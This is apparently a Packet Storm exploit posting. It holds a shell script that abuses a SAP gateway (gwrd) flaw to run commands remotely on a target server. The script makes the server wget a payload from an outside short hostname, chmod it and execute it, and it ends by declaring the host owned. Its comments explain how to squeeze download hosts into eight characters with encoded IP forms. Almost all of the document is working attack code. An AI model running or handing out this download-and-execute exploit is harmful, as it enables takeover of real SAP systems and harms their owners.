Linux port of the exploit for the gwrd bug in SAP versions below 4.6D patch 1767 and versions below 6.40 patch 4. Allows for remote command execution. Shell script version.
a55846c9b05cc9ff91e04c28793f07962b4beb73e490fe87b6e190bb5bb7e3fe#!/bin/sh
# Variables
# Ultra short URL where is located our additional code
# Max length : 8 chars
SRC="zz.1.vg"
# Filename of the downloaded file
# Max length : 6 chars (because of "-O" in wget)
FILE="./..."
# Target SAP server IP
# No restriction ;-)
TARGET="192.168.201.11"
# Set to /bin/echo to debug
DEBUG=""
###########################################################
# Some $SRC tricks
#
# Max 8 characters can be used, so you can use with wget :
#
# - any IP in the range of 1.0.0.0-5.245.224.255
# - "wget 99999999" (IP 5.245.224.255)
# - any short hostname like 'zz.1.vg'
# - "wget zz.1.vg"
# - hex IP adress or int IP mixed with standard encoding
# - wget 10.0x311 (10.0.3.17)
# - wget 10.785 (10.0.3.17)
###########################################################
# Download, chmod and launch a script/binary of your choice
# Typical command exectuted server-side :
# wget zz.1.vg sapgw17 -Oabc GWHOST=cartman GWSERV=sapgw17 CONVID=-Oabc
$DEBUG echo "Downloading with wget ..."
$DEBUG ./r3mote_unix_UDPexec.pl wget $SRC -O$FILE $TARGET
$DEBUG sleep 120
$DEBUG echo "Chmod-ing the downloaded file ..."
$DEBUG ./r3mote_unix_UDPexec.pl chmod 755 $FILE $TARGET
$DEBUG sleep 2
$DEBUG echo "Executing the file ..."
$DEBUG ./r3mote_unix_UDPexec.pl $FILE xxx xxx $TARGET
$DEBUG echo "Should be 0wn3d now ..."
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed